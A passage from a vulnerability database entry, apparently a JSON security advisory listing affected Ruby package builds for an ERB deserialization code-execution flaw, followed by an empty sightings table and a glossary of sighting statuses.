"CRB-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-irb-0:1.13.1-12.el10_1.noarch",
"CRB-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-minitest-0:5.20.0-12.el10_1.noarch",
"CRB-10.1.Z:rubygem-power_assert-0:2.0.3-12.el10_1.noarch",
"CRB-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-rake-0:13.1.0-12.el10_1.noarch",
"CRB-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-rdoc-0:6.6.3.1-12.el10_1.noarch",
"CRB-10.1.Z:rubygem-rexml-0:3.4.4-12.el10_1.noarch",
"CRB-10.1.Z:rubygem-rss-0:0.3.1-12.el10_1.noarch",
"CRB-10.1.Z:rubygem-test-unit-0:3.6.1-12.el10_1.noarch",
"CRB-10.1.Z:rubygem-typeprof-0:0.21.9-12.el10_1.noarch",
"CRB-10.1.Z:rubygems-0:3.5.22-12.el10_1.noarch",
"CRB-10.1.Z:rubygems-devel-0:3.5.22-12.el10_1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "erb: ERB: Arbitrary code execution via deserialization bypass"
}
]
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.